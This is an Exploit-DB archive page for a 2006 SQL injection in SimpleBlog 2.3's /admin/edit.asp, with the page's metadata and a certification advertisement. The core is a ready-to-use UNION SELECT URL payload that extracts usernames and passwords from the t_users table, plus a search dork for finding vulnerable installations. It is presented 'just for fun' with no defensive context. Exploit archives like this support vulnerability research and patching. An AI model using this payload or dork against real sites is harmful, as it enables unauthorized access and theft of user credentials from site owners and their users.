SimpleBlog 2.3 - '/admin/edit.asp' SQL Injection

EDB-ID:

2853


Author:

bolivar

Type:

webapps


Platform:

ASP

Date:

2006-11-26


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Title   :  simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability
# Author  :  bolivar
# Dork    :  "SimpleBlog 2.3 by 8pixel.net"

---------------------------------------------------------------------------

http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users

---------------------------------------------------------------------------
# Just for Fun!!

# milw0rm.com [2006-11-26]